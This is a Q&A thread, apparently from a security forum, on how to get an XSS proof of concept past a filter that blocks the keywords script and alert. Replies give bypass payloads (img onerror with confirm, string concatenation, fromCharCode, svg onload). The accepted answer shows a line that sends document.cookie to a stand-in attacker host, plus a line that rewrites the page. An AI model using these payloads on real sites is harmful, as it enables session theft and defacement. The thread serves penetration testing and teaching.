# How to show XSS popup without using alert and script keywords?

Tags: web-application, xss

I have come across a field that is vulnerable to XSS. It accepts  and  tags however keywords script,alert, msgbox, prompt are blocked. I have tried every encoded version of these keywords but its not working.

Is there any way that i can show a POC (XSS popup) without using the above keywords.

I successfully injected a frame and cookies are also not HTTP-only.

Comment: Nope..its blocked... used the following script
"/><img src=x.gif onerror=confirm(1)>

Comment: What if you segment the function name as concatenated strings in bracket notation, e.g., `onerror="window['al'+'ert'](1)"`? (The strings could optionally be stored in variables.) Or is the `alert` function itself somehow disabled or overwritten? (In that case, `delete window['al'+'ert']` should restore it in most browsers.)

Comment: conactenation doesnt work..i didnt get the delete window part

Comment: Hey, i did it just some more help... i loaded a localhost  with script embedded in iframe... how can i access the parent cookie from the loaded iframe.

Comment: An attacker would want his attack to be as unnoticeable as possible. An `alert` is pretty much the worst choice when trying to be unnoticed as it literally jumps into the victim’s face.

Comment: You can use confirm keyword to generate a popup as the developer forgot to block it :P

Answer (score 2, accepted):

No attacker will ever use `alert()`,  checking for this within an attack string is more than just a waste of time,  it shows that the developer doesn't understand how software is attacked.

You could show a real world attack,  where you read a CSRF token or the `document.cookie` value:

```
document.write("<img src=http://attacker/cookie_theif?c="+document.cookie+" />")
```

You could also rewrite the page, this could be used to turn the page into a phasing page:

```
document.body.innerHTML="owned:"+document.cookie
```

Answer (score -1):

```
<img src=x onerror=confirm(String.fromCharCode(88,83,83))>
```

If the site use SVG as images you can use this one:

```
<svg onload=prompt(1)>
```

No `<script>`, `alert`, `msgbox`, and or `prompt` word needed.